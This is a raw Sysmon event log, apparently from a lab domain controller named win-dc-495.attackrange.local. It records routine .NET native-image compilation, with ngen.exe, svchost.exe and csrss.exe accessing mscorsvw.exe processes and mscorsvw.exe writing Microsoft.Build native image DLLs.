13:46:02.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.281{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.547{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.547{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:03.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:03.094{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:07.984{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\614-0\Microsoft.Build.Conversion.v4.0.dll2021-01-18 13:46:07.984 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:07.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.844{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:07.844{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.750{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:07.562{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11e8-0\Microsoft.Build.dll2021-01-18 13:46:07.562 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.109{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:08.109{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.906{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:09.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:09.844{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a94-0\Microsoft.Build.Framework.dll2021-01-18 13:46:09.844 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
